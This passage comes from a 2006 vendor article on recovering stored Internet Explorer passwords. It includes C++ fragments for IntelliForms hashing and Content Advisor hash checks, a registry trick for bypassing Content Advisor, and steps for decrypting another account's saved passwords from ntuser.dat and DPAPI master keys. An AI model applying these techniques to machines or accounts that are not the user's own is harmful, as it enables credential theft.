dwRet=SHGetValue(HKCU,_T("Software\\Microsoft\\Internet Explorer\\IntelliForms\\SPW"),cszHash,NULL,&dwValue,&dwSize);
delete((LPTSTR)cszHash);

if ( dwRet==ERROR_SUCCESS )
return TRUE;

m_dwLastError=E_NOTFOUND;
return FALSE;
}

//retrieve hash by given URL text and translate it into hex format
LPCTSTR CAutoformDecrypter::GetHash(LPCTSTR cszUrl)
{
assert(cszUrl);

BYTE buf[0x10];
LPTSTR pRet=NULL;
int i;

if ( HashData(cszUrl,buf,sizeof(buf)) )
{
//Allocate some space
pRet=new TCHAR [sizeof(buf) * sizeof(TCHAR) + sizeof(TCHAR)];
if ( pRet)
{
for ( i=0; i {
// Translate it into human readable format
pRet[i]=(TCHAR) ((buf[i] & 0x3F) + 0x20);
}
pRet[i]=_T('\0');
}
else
m_dwLastError=E_OUTOFMEMORY;
}

return pRet;
}

//DoHash wrapper
BOOL CAutoformDecrypter::HashData(LPCTSTR cszData, LPBYTE pBuf,
DWORD dwBufSize)
{
assert(cszData && pBuf);

if ( !cszData || !pBuf )
{
m_dwLastError=E_ARG;
return FALSE;
}

DoHash((LPBYTE)cszData,strlen(cszData),pBuf,dwBufSize);
return TRUE;
}

void CAutoformDecrypter::DoHash(LPBYTE pData, DWORD dwDataSize,
LPBYTE pHash, DWORD dwHashSize)
{
DWORD dw=dwHashSize, dw2;

//pre-init loop
while ( dw-->0 )
pHash[dw]=(BYTE)dw;

//actual hashing stuff
while ( dwDataSize-->0 )
{
for ( dw=dwHashSize; dw-->0; )
{
//m_pPermTable = permutation table
pHash[dw]=m_pPermTable[pHash[dw]^pData[dwDataSize]];
}
}
}
===8<============End of original text============

The next, seventh generation of the browser, is most likely going to make this user's data storage mechanism its primary data storage method, declining the good old Protected Storage. Better to say, auto-fill data and passwords, from now on, are going to be stored here.

What is so special and interesting in this mechanism that made MS decide to use it as primary? Well, first of all, it was the encryption idea, which isn't new at all but still simple and genius, to disgrace. The idea is to quit storing encryption keys and generate them whenever that would be necessary. The raw material for such keys would be HTML page's Web address.

Let's see how this idea works in action. Here is IE7's simplified algorithm for saving auto-fill data and password fields:

1 Save Web page's address. We will use this address as the encryption key (EncryptionKey).
2 Obtain Record Key. RecordKey = SHA(EncryptionKey).
3 Calculate checksum for RecordKey to ensure the integrity of the record key (the integrity of the actual data will be guaranteed by DPAPI.) RecordKeyCrc = CRC(RecordKey).
4 Encrypt data (passwords) with the encryption key EncryptedData = DPAPI_Encrypt(Data, EncryptionKey).
5 Save RecordKeyCrc + RecordKey + EncryptedData in the registry.
6 Discard EncryptionKey.

It is very, very difficult to recover password without having the original Web page address. The decryption looks pretty much trivial:

1 When the original Web page is open, we take its address (EncryptionKey) and obtain the record key RecordKey = SHA(EncryptionKey).
2 Browse through the list of all record keys trying to locate the RecordKey.
3 If the RecordKey is found, decrypt data stored along with this key using the EncryptionKey. Data = DPAPI_Decrypt(EncryptedData, EncryptionKey).
In spite of the seeming simplicity, this Web password encryption algorithm is one of today's strongest. However, it has a major drawback (or advantage, depending which way you look at it.) If you change or forget the original Web page address, it will be impossible to recover password for it.

2.8. Content Advisor password
And the last item on our list is Content Advisor password. Content Advisor was originally developed as a tool for restricting access to certain websites. However, for some reason it was unloved by many users (surely, you may disagree with this.) If you once turned Content Advisor on, entered a password and then forgot it, you will not be able to access the majority of websites on the Internet. Fortunately (or unfortunately), this can be easily fixed.

The actual Content Advisor password is not stored as plaintext. Instead, the system calculates its MD5 hash and stores it in Windows registry. On an attempt to access the restricted area, the password entered by user is also hashed, and the obtained hash is compared with the one stored in the registry. Take a look at PIEPR source code checking Content Advisor password:

===8<===========Begin of original text===========
void CContentAdvisorDlg::CheckPassword()
{
CRegistry registry;

//read the registry
registry.SetKey(HKLM, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Ratings");

BYTE pKey[MD5_DIGESTSIZE], pCheck[MD5_DIGESTSIZE];
if ( !registry.GetBinaryData("Key",pKey,MD5_DIGESTSIZE) )
{
MessageBox(MB_ERR,"Can't read the password.");
return;
}

//Get one set by user
CString cs;
m_wndEditPassword.GetWindowText(cs);
MD5Init();
MD5Update((LPBYTE)(LPCTSTR)cs,cs.GetLength()+1);
MD5Final(pCheck);

//Check hashes
if ( memcmp(pKey,pCheck,MD5_DIGESTSIZE)==0 )
MessageBox(MB_OK,"The password is correct!");
else
MessageBox(MB_OK,"Wrong password.");
}
===8<============End of original text============

The first thing you may think about is to try to pick the password by using the brute force or dictionary attack. However, there is a more elegant way to that. You can simply remove the hash from the registry. That's it; so simple... Well, it's better to rename it instead, so that if you ever need it, you can restore it back. Some programs also let users check Content Advisor password, "drag out" password hint, toggle password on/off, etc.

3. Brief Overview of Internet Explorer Password Recovery Programs
It's worth noticing that not all password recovery programs suspect there are so many ways to recover passwords. Most likely, this is related to the fact that some passwords (e.g., synchronization passwords) are not often used in the real life, and FTP passwords are not so simple to be 'dragged out'. Here is a brief overview of the most popular commercial products for recovering passwords for the most popular browser on earth :)

Advanced Internet Explorer Password Recovery from the not unknown company, ElcomSoft - does not recognize AutoForm passwords and encrypted FTP passwords. Not to be excluded, the last version of the program may have learnt to do that. Simple, convenient user interface. The program can be upgraded online automatically.

Internet Explorer Key from PassWare - similarly, does not recognize certain types of passwords. Sometimes the program halts with a critical error when reading some uncommon types of IE's URLs. Displays first two characters of passwords being recovered. The advantages worth noticing are the Spartan user interface and operating convenience.

Internet Explorer Password from Thegrideon Software - not bad, but can recover just three types of Internet Explorer passwords (this is enough for the majority of cases.) Deals with FTP passwords properly. Version 1.1 has problems recovering AutoForm passwords. Has convenient user interface, which in some way reminds one from AIEPR. One can be totally overwhelmed with the beauty and helpfulness of the company's website.
ABF Password Recovery from ABF software - quite a good program with friendly user interface. The list of IE record types supported by the program is not long. Nevertheless, it deals with all of them properly. The program can be classified as a multi-functional one, since it can restore passwords for other programs also.

The major drawback of all programs named here is the capability to recover passwords only for user currently logged on.

As it was said above, the general body of stored Internet Explorer resources is kept in a special storage called Protected Storage. Protected Storage was developed specially for storing personal data. Therefore the functions for working with it (called PS API) are not documented. Protected Storage was first introduced with the release of the version 4 of Internet Explorer, which, by the way, unlike the third version, was written from scratch.

Protected Storage provides applications with an interface to store user data that must be kept secure or free from modification. Units of data stored are called Items. The structure and content of the stored data is opaque to the Protected Storage system. Access to Items is subject to confirmation according to a user-defined Security Style, which specifies what confirmation is required to access the data, such as whether a password is required. In addition, access to Items is subject to an Access rule set. There is an Access rule for each Access Mode: for example, read/write. Access rule sets are composed of Access Clauses. Typically at application setup time, a mechanism is provided to allow a new application to request from the user access to Items that may have been created previously by another application.
Items are uniquely identified by the combination of a Key, Type, Subtype, and Name. The Key is a constant that specifies whether the Item is global to this computer or associated only with this user. The Name is a string, generally chosen by the user. Type and Subtype are GUIDs, generally specified by the application. Additional information about Types and Subtypes is kept in the system registry and include attributes such as Display Name and UI hints. For Subtypes, the parent Type is fixed and included in the system registry as an attribute. The Type group Items is used for a common purpose: for example, Payment or Identification. The Subtype group Items share a common data format.

So, until very recent time, all programs for recovering Internet Explorer passwords used those undocumented API. That's the reason why one significant restriction was applied to the recovery work: PS API can only work with passwords for user that is currently logged on. When the system encrypts data stored in Protected Storage, besides everything else it uses user's SID, without which it is literally impossible (taking into account the current level of computers' calculating performance) to recover stored passwords.

Protected Storage uses a very well thought through data encryption method, which uses master keys and strong algorithms, such as des, sha, and shahmac. Similar data encryption methods are now used in the majority of modern browsers; e.g. in Opera or FireFox. Microsoft, meanwhile, quietly but surely develops and tests new ones. When this article is written, in the pre-Beta version of Internet Explorer 7 Protected Storage was only used for storing FTP passwords.

The analysis of this preliminary version suggests that Microsoft is preparing another 'surprise' in the form of new, interesting encryption algorithms. It is not known for sure, but most likely the new company's data protection technology InfoCard will be involved in the encryption of private data.

Thus, with a great deal of confidence one can assert that with the release of Windows Vista and the 7th version of Internet Explorer passwords will be stored and encrypted with fundamentally new algorithms, and the Protected Storage interface, to all appearances, will become open for third-party developers.

It is somewhat sad, for we think the true potential of Protected Storage was still not uncovered. And this is why we think so:
- First, Protected Storage is based on module structure, which allows plugging other storage providers to it. However, for the last 10 years while Protected Storage exists, not a single new storage provider was created. System Protected Storage is the only storage provider in the operating system, which is used by default.
- Second, Protected Storage has its own, built-in access management system, which, for some reason, is not used in Internet Explorer or in other MS products.
- Third, it is not very clear why MS have decided to decline Protected Storage in storing AutoComplete data and passwords. Decline it as a tried and true data storage, and not data encryption mechanism. It would be more logically proven to keep Protected Storage at least for storing data when implementing a new encryption algorithm. Without fail, there were weighty reasons for that. Therefore, it would be interesting to hear the opinion of MS specialists concerning this subject matter.

4. PIEPR - the First Acquaintance
Passcape Internet Explorer Password Recovery was developed specifically to bypass the PS API's restriction and make it possible to recover passwords directly, from the registry's binary files. Besides, it has a number of additional features for advanced users.

The program's wizard allows you to choose one of several operating modes:
- Automatic: Current user's passwords will be recovered by accessing the closed PS API interface. All current user's passwords currently stored in Internet Explorer will be recovered with a single click of the mouse.
- Manual: Passwords will be recovered without PS API. This method's main advantage is the capability to recover passwords from your old Windows account. For that purpose, you will need to enter path to the user's registry file. Registry files are normally not available for reading; however, the technology used in PIEPR allows doing that (provided you have the local administrative rights.)

User's registry file name is ntuser.dat; its resides in the user's profile, which is normally %SYSTEMDRIVE%:\Documents and Settings\%USERNAME%, where %SYSTEMDRIVE% stands for the system disk with the operating system, and %USERNAME% is normally account name. For instance, path to registry file may look like this: C:\Documents and Settings\John\ntuser.dat

If you have ever been a happy owner of Windows 9x/ME, after you upgrade your operating system to Windows NT, Protected Storage will providently save a copy of your old private data. As a result of that, Protected Storage may contain several user identifiers, so PIEPR will ask you to select the right one before it gets to the decryption of the data (fig.3 http://www.passcape.com/images/ie03.png).

One of the listed SIDs will contain data left by the old Windows 9x/ME. That data is additionally encrypted with user's logon password, and PIEPR currently does not support the decryption of such data.

If ntuser.dat contains encrypted passwords (e.g., FTP sites passwords), the program will need additional information in order to decrypt them (fig.4 http://www.passcape.com/images/ie04.png):
- Logon password of user whose data are to be decrypted
- Full path to the user's MasterKey
- User's SID

Normally, the program finds the last two items in user's profile and fills that data automatically. However, if ntuser.dat was copied from another operating system, you will have to take care of that on your own. The easiest way to get the job done is to copy the entire folder with user's Master Key (there may be several of them) to the folder with ntuser.dat. Master Key resides in the following folder on your local computer: %SYSTEMDRIVE%:\Documents and Settings\%USERNAME%\Application Data\Microsoft\Protect\%UserSid%, where %SYSTEMDRIVE% stands for the system disk with the operating system, %USERNAME% - account name, %UserSid% - user's SID. For example, path to the folder with a master key may look as follows: C:\Documents and Settings\John\Application Data\Microsoft\Protect\S-1-5-21-1587165142-6173081522-185545743-1003. Let's make it clear that it is recommended to copy the entire folder S-1-5-21-1587165142-6173081522-185545743-1003, for it may contain several Master Keys. Then PIEPR will select the right key automatically.

Windows marks some folders as hidden or system, so they are invisible in Windows Explorer. To make them visible, enable showing hidden and system objects in the view settings or use an alternative file manager.

Once the folder with user's Master Key was copied to the folder with ntuser.dat, PIEPR will automatically find the required data, so you will only have to enter user's password for recovering FTP passwords.

Content Advisor
Content Advisor passwords, as it was said already, is not kept as plain text; instead, it is stored as hash. In the Content Advisor password management dialog, it is enough to just delete (you can restore the deleted password at any time later) or change this hash to unlock sites locked with Content Advisor. PIEPR will also display your password hint if there is one.

Asterisks passwords
PIEPR's fourth operating mode, which allows recovering Internet Explorer passwords hidden behind asterisks. To recover such password, simply drag the magnifier to the window with a **** password. This tool allows recovering passwords for other programs that use IE Frames as well; e.g., Windows Explorer, some IE-based browsers, etc.

We have reviewed the basic Internet Explorer password recovery modes. There is also a number of additional features for viewing and editing cookies, cache, visited pages history, etc. We are not going to cover them in detail; instead, we are going to look at a few password recovery examples done with PIEPR.

5.1. Three Real-Life Examples.
Example 1: Recovering current user's FTP password
When opening an FTP site, Internet Explorer pops up the log on dialog (fig.5 http://www.passcape.com/images/ie05.png).

If you have opened this site and set the 'Save password' option in the authentication dialog, the password must be saved in Protected Storage, so recovering it is a pretty trivial job. Select the automatic operating mode in PIEPR and then click 'Next'. Locate our resource in the dialog with decrypted passwords that appears (the site name must appear in the Resource Name column.)

As we see, the decryption of current user's password should not cause any special difficulties. Oh, if the password is not found for some reason - don't forget to check IE's Auto-Complete Settings. Possibly, you have simply not set the program to save passwords.

5.2. Three Real-Life Examples.
Example 2: We will need to recover Web site passwords. The operating system is unbootable.
This is a typical, but not fatal situation. The necessity to recover Internet Explorer passwords after unsuccessful Windows reinstallation occurs just as often.

In either case, we will have user's old profile with all files within it. This set is normally enough to get the job done. In the case with the reinstallation, Windows providently saves the old profile under a different name. For example, if your account name was John, after renaming it may look like John.WORK-72C39A18.

The first and the foremost what you must do is to gain access to files in the old profile. There are two ways to doing this:
- Install a new operating system on a different hard drive; e.g., Windows XP, and hook the old hard drive to it.
- Create a Windows NT boot disk. There are many different utilities for creating boot disks and USB flash disks available online. For instance, you can use WinPE or BartPE. Or a different one. If your old profile was stored on an NTFS part of your hard drive, the boot disk will have to support NTFS.

Let's take the first route. Once we gain access to the old profile, we will need to let the system show hidden and system files. Otherwise, the files we need will be invisible. Open Control Panel, then click on Folder Options, and then select the View tab. On this tab, find the option 'Show hidden files and folders' and select it. Clear the option 'Hide protected operating system files'. When the necessary passwords are recovered, it's better to reset these options to the way they were set before.

Open the program's wizard in the manual mode and enter path to the old profile's registry file. In our case, that is C:\Documents And Settings\ John.WORK-72C39A18\ntuser.dat. Where John.WORK-72C39A18 is the old account name. Click 'Next'.

This data should normally be sufficient for recovering Internet Explorer passwords. However, if there is at least a single encrypted FTP password, the program will request additional data, without which it will not be able to recover such types of passwords:
- User's password
- User's Master Key
- User's SID.
Normally, the program finds the last two items in user's profile and fills that data automatically. However, if that didn't happen, you can do that by hand: copy ntuser.dat and the folder with the Master Key to a separate folder. It is important to copy the entire folder, for it may contain several keys, and the program will select the right one automatically. Then enter path to file ntuser.dat that you have copied to another folder.

That's it. Now we need to enter the old account password, and the recovery will be completed. If you don't care for FTP password, you can skip the user's password, Master Key, and SID entry dialog.

5.3. Three Real-Life Examples.
Example 3: Recovering uncommonly stored passwords.
When we sometimes open a website in the browser, the authentication dialog appears. However, PIEPR fails to recover it in either automatic or manual mode. The 'Save password' option in Internet Explorer is enabled. We will need to recover this password.

Indeed, some websites don't let browser to save passwords in the auto-complete passwords list. Often, such websites are written in JAVA or they use alternative password storage methods; e.g., they store passwords in cookies. A cookie is a small bit of text that accompanies requests and pages as they go between the Web server and browser. The cookie contains information the Web application can read whenever the user visits the site. Cookies provide a useful means in Web applications to store user-specific information. For example, when a user visits your site, you can use cookies to store user preferences or other information. When the user visits your Web site another time, the application can retrieve the information it stored earlier. Cookies are used for all sorts of purposes, all relating to helping the Web site remember you. In essence, cookies help Web sites store information about visitors. A cookie also acts as a kind of calling card, presenting pertinent identification that helps an application know how to proceed. But often cookies criticized for weak security and inaccurate user identification.

If the password field is filled with asterisks, the solution is clear: select the ASTERISKS PASSWORDS operating mode and then open the magic magnifier dialog. Then simply drag the magnifier to the Internet Explorer window (fig.6 http://www.passcape.com/images/ie06.png).

The password (passwords, if the Internet Explorer window has several fields with asterisks) is to appear in the PIEPR window (fig.7 http://www.passcape.com/images/ie07.png).

But it's not always that simple. The password field may be empty or that field may indeed contain *****. In this case, as you have guessed by now, the ASTERISKS PASSWORDS tool will be useless.

We can suppose, the password is stored in cookies. Let's try to locate it. Choose the IE Cookie Explorer tool (fig.8 http://www.passcape.com/images/ie08.png).

The dialog that appears will list the websites that store cookies on your computer. Click on the URL column header to order the websites list alphabetically. This will help us find the right website easier. Go through the list of websites and select the one we need. The list below will display the decrypted cookies for this website (fig.9 http://www.passcape.com/images/ie09.png).

As the figure shows, in our case the login and password are not encrypted and are stored as plain text.

Cookies are often encrypted. In this case, you are not likely to succeed recovering the password. The only thing you can try doing in order to recover the old account is to create a new account. Then you will be able to copy the old cookies in a text editor and replace them with the new ones. However, this is only good when the worst comes to the worst; it is not recommended to use it normally.

Don't forget also that just about all pages and forms with passwords have the 'Forgot password' button.

Conclusion
As this article shows, recovering Internet Explorer passwords is a pretty simple job, which does not require any special knowledge or skills. However, despite of the seeming simplicity, password encryption schemes and algorithms are very well thought through and just as well implemented. Although the Protected Storage concept is over 10 years of age, don't forget that it has proven the very best recommendations of the experts and has been implemented through three generations of this popular browser.

With the release of the next, 7th version of IE, Microsoft is preparing fundamentally new schemes for protecting our private data, where it uses improved encryption algorithms and eliminates shortages peculiar to Protected Storage.

In particular, the analysis of the preliminary beta versions of Internet Explorer 7 has revealed that autoform password encryption keys are no longer stored along with data. They are not stored, period! This is a little know-how, which is to be estimated at its true worth by both professionals and end users, who, finally, will benefits of it anyway.

But the main thing is, the release of the new concept will eliminate the major drawback peculiar to Protected Storage, which is the possibility to recover passwords without knowing the additional information. Better to say, was enough for a potential hacker to gain physical access to the contents of a hard drive, in order to steal or damage passwords and user's other private data. With the release of Internet Explorer 7, the situation will somewhat change.

Meanwhile, we will only have to wait impatiently for the advent of Windows Vista and IE 7 to take a closer look at new encryption mechanisms used in the next generation of this popular browser.

This document may be freely distributed or reproduced provided that the
reference to the original article is placed on each copy of this document.
(c) 2006 Passcape Software. All rights reserved.
http://www.passcape.com